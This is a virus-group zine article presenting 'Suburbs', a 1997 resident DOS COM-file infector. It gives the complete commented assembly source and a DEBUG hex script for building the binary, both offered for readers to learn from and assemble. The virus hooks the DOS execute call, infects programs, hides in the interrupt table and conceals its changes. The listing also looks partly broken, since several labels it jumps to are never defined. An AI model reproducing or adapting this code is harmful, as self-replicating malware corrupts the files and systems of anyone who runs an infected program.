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SLAM2.034: Resident com-infector Suburbs by Virtual Daemon [SLAM]

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Published in 
 · 23 Feb 2022

| Suburbs virus (c) 1997, by Virtual Daemon of SLAM |

Here's the source for the Suburbs virus. I made him a couple of time ago, when I didn't know how to do a REAL virus... ;-)

The source is commented enough to understand it (I think), so you shouldn't have any difficulties...

The virus is kind of lame, but it use a good method for going resident, so if you don't know it already, here's the chance for you to learn it!

Ok. Here's some info about it...

Virus Name: Suburbs (level 16 of DOOM ][)
Virus Author: Virtual Daemon
Virus Group: SLAM Virus Team
Virus Size: 400 bytes

Features: - resident encrypted COM infector with INT21h handler

  • infect on 4bh (execute)
  • use 80286 instructions (8086 are dead! :)
  • use the free space at the end of the interrupt table at 0:0200h
    • => can't be seen with programs like MEM or TSRLIST and it doesn't take 1K from 640! :)

  • use INT24 handler (doesn't display errors)
  • save/restore file time/date/attributes
  • very simple encryption of the 3 bytes from JMP
  • no payload... sorry! :-(

---------------------------------- cut here ----------------------------------- 
; To build this shit use: tasm suburbs.asm
; tlink /t suburbs.obj
.286 ;use 80286 instructions (can be modified easily to work with 8086)
code segment byte
assume cs:code,ds:code
org 100h
db 0e9h ;jmp to virus_start
len dw 8 ;offset begin+8 bytes - where to Jump

db '$'
db '$'
db 5 dup(90h) ;5 NOP's+RET=a simple program so the virus can work

jmp install ;install the virus in memory

new24handler equ $-virus_start
mov al,3 ;return to program indicating a failed DOS function
iret ;return from interrupt
new21handler proc
cmp ah,4bh ;4bh=execute a file
je infect_it ;cool... a file was executed! let's infect it!
jmp restore_interrup
pusha ;save registers: ax,bx,cx,dx,bp,si,di,ds,es
push ds
push es

mov ax,4300h ;DOS function = get file attributes
int 21h
push cx ;save file attribute
push ds ;save the ASCIIZ adress of file
push dx

mov ax,4301h ;DOS function = set new file attributes
xor cx,cx ;cx=0 => file attribute=normal file
int 21h

mov ax,3d02h ;DOS function = open file for read-write
int 21h
xchg bx,ax ;save handle in bx

mov ax,0020h
mov ds,ax ;set DS to new adress

mov word ptr ds:[buffer],bx ;save file handle

mov ax,3524h ;DOS function = get interrupt vector (INT 24h)
int 21h
push es ;save INT 24h segment
push bx ;save INT 24h offset

mov ax,2524h ;DOS function = set interrupt vector (INT 24h)
mov dx,new24handler ;make it point to our procedure
int 21h
mov bx,word ptr ds:[buffer] ;restore file handle

mov ax,5700h ;DOS function = get file time/date
int 21h
push dx ;save date
push cx ;save time

mov ah,3fh ;DOS function= read from file
mov dx,buffer ;save into 'buffer'
mov cx,3 ;read 3 bytes
int 21h
jnc continue ;if no error then continue
jmp close_file ;else close the file and return to original program
cmp word ptr ds:[buffer],'ZM' ;check too see if file is EXE
je close_file ;is EXE? Then exit

cmp word ptr ds:[buffer],'MZ' ;check again for EXE (in ZM form)
je close_file ;is EXE? Then exit

mov ax,4200h ;DOS function = set file pointer
xor cx,cx
mov dx,word ptr ds:[buffer+1] ;seek to beginning+0:[buffer+1]+3
add dx,3
int 21h

mov ah,3fh ;DOS function = read from file
mov dx,virus_end+2 ;from virus_end+2
mov cx,3 ;read 3 bytes
int 21h

cmp byte ptr ds:[virus_end+2],0e9h ;check if already infected
je close_file
xor byte ptr ds:[buffer],33 ;encrypt the 3 bytes from JMP
xor byte ptr ds:[buffer+1],133
xor byte ptr ds:[buffer+2],45

mov ax,4202h ;DOS function = set file pointer
xor cx,cx ;seek to EOF
xor dx,dx
int 21h
mov bp,ax ;bp=ax=filesize

mov ah,40h ;DOS function = write to file
xor dx,dx ;current buffer
mov cx,virus_end ;number of bytes=virus_end
int 21h
jc close_file ;if error then close the file

mov ax,4200h ;DOS function = set file pointer
xor cx,cx ;seek to beginning
xor dx,dx
int 21h

mov si,virus_end+1
mov byte ptr ds:[virus_end+1],0e9h ;put the JMP code (0e9h)
mov ax,bp ;bp=filesize
sub ax,3 ;ax=filesize-3 (size of JMP code)

mov word ptr ds:[virus_end+2],ax ;save the 2nd & 3rd bytes in JMP

mov dx,virus_end+1 ;write new JMP (3 bytes)
mov ah,40h ;DOS function = write to file
mov cx,3
int 21h
mov ax,5701h ;DOS function = set file date/time
pop cx ;restore time
pop dx ;restore date
int 21h

mov ah,3eh ;DOS function = close file
int 21h

pop dx ;restore INT 24h offset
pop ds ;restore INT 24h segment
mov ax,2524h ;DOS function = set interrupt vector (for INT 24h)
int 21h

mov ax,4301h ;DOS function = set file attributes
pop dx ;restore the ASCIIZ adress of file
pop ds
pop cx ;restore file attributes
int 21h

pop es ;restore saved registers
pop ds
db 0eah ;jmp to old INT21h vector

add21 equ $-virus_start
int21offset dw 0 ;old INT21h offset
int21segment dw 0 ;old INT21h segment
new21handler endp

db 66h ;for Sourcer :^)
pusha ;save all registers
push ds
push es

mov di,ds

mov ax,20h
mov ds,ax
cmp word ptr ds:[0],0 ;check to see if already installed
jne quit

mov ds,di

xor ax,ax ;save the old INT 21h interrupt vector using direct
mov es,ax ;manipulation
mov di,21h*4
mov ax,es:[di]
mov bx,es:[di+2]

mov si,[len]
add si,add21+103h
mov word ptr cs:[si],ax
mov word ptr cs:[si+2],bx

xor ax,ax
mov di,ax
mov si,[len]
add si,100h+3
push cs
pop ds
mov ax,0020h ;copy virus to memory
mov es,ax
mov cx,virus_end
rep movsb

xor ax,ax ;set new INT 21h handler
mov es,ax
mov di,21h*4
mov word ptr es:[di],6
mov ax,0020h
mov word ptr es:[di+2],ax
mov ax,cs
mov ds,ax
mov es,ax

mov si,[len] ;get the 3 bytes from buffer in si register
add si,100h+buffer+3
xor byte ptr ds:[si],33 ;decrypt the 3 bytes
xor byte ptr ds:[si+1],133
xor byte ptr ds:[si+2],45

mov di,100h ;copy the 3 bytes from JMP
mov cx,3
rep movsb

pop es ;restore saved registers
pop ds

push 100h ;return to host

buffer equ $-virus_start
jmpbyte1 db 177 ;the JMP instruction encrypted with a simple XOR
jmpbyte2 db 21
jmpbyte3 db 189
virus_author db '[VD/SLAM]',0
virus_name db 'Suburbs',0
virus_end equ $-virus_start

code ends
end begin
--------------------------------- cut here ----------------------------------

Here's a copy of Suburbs in debug script format for those who don't have
Turbo Assember/Linker. Just enter DEBUG < script_name.

--------------------------------- cut here ----------------------------------
E 0100 E9 08 00 24 24 90 90 90 90 90 C3 E9 F3 00 B0 03
E 0110 CF 80 FC 4B 74 03 E9 E3 00 60 1E 06 B8 00 43 CD
E 0120 21 51 1E 52 B8 01 43 33 C9 CD 21 B8 02 3D CD 21
E 0130 93 B8 20 00 8E D8 89 1E 7B 01 B8 24 35 CD 21 06
E 0140 53 B8 24 25 BA 03 00 CD 21 8B 1E 7B 01 B8 00 57
E 0150 CD 21 52 51 B4 3F BA 7B 01 90 B9 03 00 CD 21 73
E 0160 03 EB 7C 90 81 3E 7B 01 4D 5A 74 73 81 3E 7B 01
E 0170 5A 4D 74 6B B8 00 42 33 C9 8B 16 7C 01 83 C2 03
E 0180 CD 21 B4 3F BA 92 01 90 B9 03 00 CD 21 80 3E 92
E 0190 01 E9 74 4B 80 36 7B 01 21 80 36 7C 01 85 80 36
E 01A0 7D 01 2D B8 02 42 33 C9 33 D2 CD 21 8B E8 B4 40
E 01B0 33 D2 B9 90 01 90 CD 21 72 25 B8 00 42 33 C9 33
E 01C0 D2 CD 21 BE 91 01 90 C6 06 91 01 E9 8B C5 2D 03
E 01D0 00 A3 92 01 BA 91 01 90 B4 40 B9 03 00 CD 21 B8
E 01E0 01 57 59 5A CD 21 B4 3E CD 21 5A 1F B8 24 25 CD
E 01F0 21 B8 01 43 5A 1F 59 CD 21 07 1F 61 EA 00 00 00
E 0200 00 66 60 1E 06 8C DF B8 20 00 8E D8 83 3E 00 00
E 0210 00 75 4B 8E DF 33 C0 8E C0 BF 84 00 26 8B 05 26
E 0220 8B 5D 02 8B 36 01 01 81 C6 F5 01 2E 89 04 2E 89
E 0230 5C 02 33 C0 8B F8 8B 36 01 01 81 C6 03 01 0E 1F
E 0240 B8 20 00 8E C0 B9 90 01 90 F3 A4 33 C0 8E C0 BF
E 0250 84 00 26 C7 05 06 00 B8 20 00 26 89 45 02 8C C8
E 0260 8E D8 8E C0 8B 36 01 01 81 C6 7E 02 80 34 21 80
E 0270 74 01 85 80 74 02 2D BF 00 01 B9 03 00 F3 A4 07
E 0280 1F 61 68 00 01 C3 B1 15 BD 5B 56 44 2F 53 4C 41
E 0290 4D 5D 00 53 75 62 75 72 62 73 00
--------------------------------- cut here ----------------------------------

Virtual Daemon

Viral Development Researcher & Virii Colector
Member of SLAM Virus Team
Network Administrator

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